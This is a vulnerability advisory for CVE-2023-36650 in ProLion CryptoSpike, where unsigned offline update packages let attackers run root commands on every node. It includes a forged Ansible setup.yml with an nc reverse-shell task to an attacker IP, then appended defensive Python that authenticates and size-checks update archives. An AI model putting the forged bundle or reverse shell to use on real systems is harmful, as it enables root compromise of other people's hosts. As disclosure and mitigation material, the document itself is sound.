Headline
CVE-2023-36650: CVCN
A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages.
Introduction
The CryptoSpike system provides an update function that works both in online mode, when the server has Internet access, and in offline mode. In the latter case, the software update is performed by uploading into CryptoSpike the update packages released by the vendor in the form of archive files. The upload can be performed through a dedicated section of the management interface or, alternatively, through the REST APIs.
It has been verified that the offline update path is insecure because no authenticity or integrity check is performed on the update packages released by the vendor, so a malicious actor can forge a package before it is loaded on the system. Consequently, arbitrary operating system commands can be placed inside the update files, and they are executed on all the nodes of the system (leader and agents) with root privileges.
Steps to reproduce
Connect to the CryptoSpike web management interface (on the Leader node) with an identity whose role includes the “Update” permission set to MODIFY, then open the “System”, “Update” section, where updates can be uploaded in .tgz format.
The malicious actor modifies an existing update package or prepares one with the layout the product expects (that is, an Ansible descriptor in YAML format named setup.yml inside a directory named “bundle”) containing two malicious tasks: the first writes a file inside the /tmp/ directory on the filesystem and the second opens a reverse shell towards an attacker machine:
---
- name: Hacked script
  hosts: all
  become: yes
  vars:
    # product information
    product_name: "Product"
    product_version: "V0.0.0"
    # base directory where the bundle files are located
    target_dir: "/prolion/packages"
    log_dir: "/prolion/logs"
    log_file_name: "update_os.log"
  tasks:
    - name: "create a file"
      shell: "echo HACKED > /tmp/HACKED.txt"
    - name: "execute reverse shell"
      shell: "nc [REDACTED IP].230 1234 -e /bin/sh"
On the attacker machine a netcat listener has been started in advance on the same port specified in the second task of the update bundle listed above.
After a few moments, the Ansible tasks are executed by the update subsystem with root privileges, as shown in the picture below: the obtained reverse shell allows verifying that the running user is root on the host server (the leader host node, not the container node), and a file owned by root has been written inside the /tmp/ directory on the filesystem.
It has also been verified that the Ansible tasks can be run on all the infrastructure nodes (Leader and Agent nodes) and without prior checks on the .tgz archive contents, thus allowing “zip bomb” attacks that would cause a complete crash of the system.
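An added example, not ProLion's code and not taken from the advisory, showing the two checks the offline update path lacks: authenticating the .tgz before anything inside it is parsed (the missing integrity check from the Introduction), and bounding the archive's declared contents before extraction (the unchecked .tgz contents that allow the “zip bomb” case above). The key, the size caps, the required member path and the in-memory bundle builder are constructed assumptions, and HMAC stands in for the asymmetric signature a real vendor update channel would use.

```python
import hashlib
import hmac
import io
import tarfile

# Hypothetical: a real appliance would pin the vendor's public key and verify an
# asymmetric signature (e.g. Ed25519); HMAC with a constructed key is used only so the example runs on the stdlib.
VENDOR_KEY = b"constructed-vendor-key"
REQUIRED_MEMBER = "bundle/setup.yml"   # the descriptor the advisory describes

def sign_bundle(data, key=VENDOR_KEY):
    """Vendor side: authentication tag over the whole archive, shipped beside it."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def check_archive_contents(data, max_member=50 * 2**20, max_total=500 * 2**20):
    """Walk the tar index without extracting; return the reasons to reject, if any."""
    problems, names, total = [], set(), 0
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar:  # header-only walk, nothing is written to disk
            names.add(m.name)
            if m.name.startswith("/") or ".." in m.name.split("/"):
                problems.append("unsafe path: " + m.name)
            if m.issym() or m.islnk():
                problems.append("link member: " + m.name)
            if m.size > max_member:
                problems.append("member too large: " + m.name)
            total += m.size  # declared sizes bound the decompressed footprint
            if total > max_total:
                problems.append("bundle exceeds total size cap")
                break
    if REQUIRED_MEMBER not in names:
        problems.append("missing " + REQUIRED_MEMBER)
    return problems

def validate_update(data, tag, key=VENDOR_KEY, **limits):
    """Appliance side: authenticate first, only then parse the untrusted archive."""
    if not hmac.compare_digest(sign_bundle(data, key), tag):
        return False, ["authentication tag mismatch"]
    problems = check_archive_contents(data, **limits)
    return not problems, problems

def make_bundle(members):
    """Build a constructed in-memory .tgz from {path: bytes} (test input only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()
```

The ordering in validate_update is the point: a package that fails authentication is never opened, so oversized or traversing members inside a forged archive are never even read.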